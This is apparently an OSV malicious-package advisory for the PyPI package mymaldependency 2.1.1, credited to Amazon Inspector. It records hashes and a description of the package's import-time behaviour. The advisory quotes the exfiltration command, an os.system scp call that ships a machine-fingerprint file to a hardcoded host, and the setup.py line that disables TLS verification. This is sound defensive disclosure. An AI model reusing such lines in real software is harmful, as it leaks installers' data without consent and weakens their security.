{"id":"MAL-2026-3694","summary":"Malicious code in mymaldependency (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (38372ffa2ec19cee68f769508d95ffb4f5c1878aeae058ce3e7a33b947d06cf1)\nMyMalDependency_package/__init__.py executes on every import: it calls os.uname() and os.getcwd(), writes the results to./trans.txt in the installer's working directory, then invokes os.system('scp trans.txt Dell@192.168.129.164:E:\\\\download') to ship the file to a hardcoded remote host. This is a one-way exfiltration of installer machine fingerprint data combined with unconsented shell command execution at import time. setup.py additionally disables TLS certificate verification globally (ssl._create_default_https_context = ssl._create_unverified_context), weakening the installer's trust posture during install. Source comments ('#恶意的依赖项' — Chinese for 'malicious dependency') and a startup print ('start mal dependency') explicitly declare malicious intent. Metadata is placeholder (author '1', UNKNOWN fields, description 'test to create package'). Regardless of whether the hardcoded private-range destination IP is currently reachable, the code pattern constitutes active attack behavior against anyone who imports the package.\n","modified":"2026-05-13T20:22:40.161523Z","published":"2026-05-12T07:43:18Z","database_specific":{"malicious-packages-origins":[{"sha256":"38372ffa2ec19cee68f769508d95ffb4f5c1878aeae058ce3e7a33b947d06cf1","import_time":"2026-05-13T20:10:54.545210822Z","source":"amazon-inspector","id":"IN-MAL-2026-002298","versions":["2.1.1"],"modified_time":"2026-05-12T19:03:07Z"}]},"references":[{"type":"PACKAGE","url":"https://pypi.org/project/MyMalDependency/2.1.1/"}],"affected":[{"package":{"name":"mymaldependency","ecosystem":"PyPI","purl":"pkg:pypi/mymaldependency"},"versions":["2.1.1"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/mymaldependency/MAL-2026-3694.json","cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"evidence_files":[{"tlsh":"f3e0c69120a81ba8410bf0ea8e0cc35a9812f45283b06020c700a4aece0a95da018b79","sha256":"9a0b6296be73e06b09502381d5d21c2f6c47200e6223394c85a8efc8c2f15132","path":"MyMalDependency_package/__init__.py"},{"tlsh":"96e0c6328801f120a0c2b4eb09713039fb959c3a1420f0c433c1034916d518a9a0b81e","sha256":"839ec74ba3a23ad2966dfc00b5b13ab295dc8febf97cd1d578c369544eaa5bf5","path":"setup.py"},{"tlsh":"6cd023c8b5739015d0b2465614d043e74dd0132878dd05d95840350417272c31b4e073","sha256":"b075784fbf82fa60dce71ec1b095a4938d340343cab5ecb272c525f450d56d05","path":"PKG-INFO"}],"package_integrity":[{"hashes":{"blake2b_256":"75ad00854a6201068d1160b864a38ffaece8351a7732243a9bc4d1aaa4a688d8","sha256":"45899cb57dafe5b8e002a871c9084bb4a4d086f96904f2010d175f4455eac8f6","md5":"02bc3c535a8809858a1f8426302b94f8"},"filename":"MyMalDependency-2.1.1.tar.gz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}